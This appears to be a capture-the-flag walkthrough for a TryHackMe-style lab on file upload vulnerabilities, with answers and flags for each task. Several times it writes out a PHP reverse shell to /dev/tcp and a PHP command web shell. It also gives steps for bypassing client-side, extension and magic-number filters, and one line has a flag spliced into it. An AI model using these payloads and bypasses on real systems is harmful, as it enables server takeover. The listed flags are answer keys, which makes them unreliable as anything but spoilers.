Getting Started

Configure your hosts file for the task, as per the instructions above.

No answer needed

Introduction

Read and understand the above information.

No answer needed

General Methodology

Read the General Methodology

No answer needed

Overwriting Existing Files

What is the name of the image file which can be overwritten?

Follow the instructions of the room and go to overwrite.uploadvulns.thm. Inspect the site and you will see that the background image is stored under images/mountains.jpg.

mountains.jpg

Overwrite the image. What is the flag you receive?

Upload a new file named mountains.jpg to get the flag.

**THM{OTBiODQ3YmNjYWZhM2UyMmYzZDNiZjI5} **

Remote Code Execution

Run a Gobuster scan on the website using the syntax from the screenshot above. What directory looks like it might be used for uploads?

/resources

Get either a web shell or a reverse shell on the machine.

What's the flag in the /var/www/ directory of the server? Upload <?php exec("/bin/bash -c 'bash -i >& /dev/tcp/IP/PORT 0>&1'"); as a php-file. Start a listener using nc -lnvp PORT and execute the script by accessing http://shell.uploadvulns.thm/resources/shell.php. After the reverse shell is opened you can get the flag by using cat /var/www/flag.txt.

THM{YWFhY2U3ZGI4N2QxNmQzZjk0YjgzZDZk}

Note you can also use a webshell using <?php system($_GET['cmd']); ?> and getting the flag using http://shell.uploadvulns.thm/resources/shell.php?cmd=cat /var/www/flag.txt;. But I prefer reverse shells (assuming that my actions are legal).

Filtering

What is the traditionally predominant server-side scripting language?

php

When validating by file extension, what would you call a list of accepted extensions (whereby the server rejects any extension not in the list)?

whitelist

[Research] What MIME type would you expect to see when uploading a CSV file?

text/csv

Bypassing Client-Side Filtering

What is the flag in /var/www/?

Use gobuster to find out the directory where uploaded images are stored (/images). Open Burpsuite and change the interception-options to intercept js-files as well. Visit java.uploadvulns.thm and intercept the request.

Note: Eventually you have to reconfigure the target details, otherwise Burpsuite may try to intercept the site as https instead of http.

When intercepting the request make sure to instruct Burpsuite to also intecept the responses. When you go through the interceptions you can remove the "client-side-filter"-script and the "firstload"-script and drop the interceptions when they are send to your device, deactivate the interception. Create a reverse-shell using <?php exec("/bin/bash -c 'bash -i >& /dev/tcp/IP/PORT 0>&1'"); and open a listener using nc -lnvp PORT. Upload the php-file and access it via java.uploadvulns.thm/images/shell.php and a remote-shell will open. Once the shell is established use cat /var/www/flag.txt to access the flag.

THM{NDllZDQxNjJjOTE0YWNhZGY3YjljNmE2}

Bypassing Server-Side Filtering: File Extensions

What is the flag in /var/www/?

Use gobuster to enumerate the directories of the site. Go to http://http://annex.uploadvulns.thm/. Create a remote-shell using <?php exec("/bin/bash -c 'bash -i >& /dev/tcp/IP/PORT 0>&1'"); and save it as a .php5-file. Type in select to select the .php5-file and upload it using upload. After that move to http://http://annex.uploadvulns.thm/privacy. Start a listener using nc -lnvp PORT and select the uploaded file to start the reverse-shell. Once the shell is established use cat /var/www/flag.txt to get the flag.

THM{MGEyYzJiYmI3ODIyM2FlNTNkNjZjYjFl}

Bypassing Server-Side Filtering: Magic Numbers

Grab the flag from /var/www/

Create a php-remote-shell using AAAAAA <?php exec("/bin/bash -c 'bash -i >& /dev/tcp/IP/PORT 0>&1'");. Open a hexeditor and change the first 12 values from "41 41 41 41 41 41" to "47 49 46 38 37 61". Upload the file, start a listener using nc -lnvp PORT and access the file by accessing http://magic.uploadvulns.thm/graphics/shell.php. In the shell uTHM{MWY5ZGU4NzE0ZDlhNjE1NGM4ZThjZDJh}se cat /var/www/flag.txt to get the flag.

THM{MWY5ZGU4NzE0ZDlhNjE1NGM4ZThjZDJh}

Example Methodology

Read the example methodology

No answer needed

Challenge

Hack the machine and grab the flag from /var/www/

Note: There is a complete walkthrough in the hints of the THM-task.

Visit the provided site and intercept your traffic, when your device requests the "upload.js" intercept the response and you can manipulate the script. Remove the filter-functionalities regarding the file-ending and magic numbers and forward the script to your device. Use gobuster to enumerate the directories of the site. By inspecting the background you can see that there is a "content"-directory where the images are stored. Use gobuster and the provided "UploadVulnsList.txt" to enumerate the images of the "content"-directory. Create a reverse-shell using nodejs and save it as a .jpg-file. Upload the file and enumerate the files of the "content"-directory again to determine where your files is stored. After you figure out where the file is stored you can access it. Make sure to have a listener running and go to the "admin"-site of the site. There you can start your script using ../content/FILE.jpg. When your reverse-shell is established you can get the flag using cat /var/www/flag.txt.

THM{NzRlYTUwNTIzODMwMWZhMzBiY2JlZWU2}

Conclusion

Room completed, and hosts file reverted!

No answer needed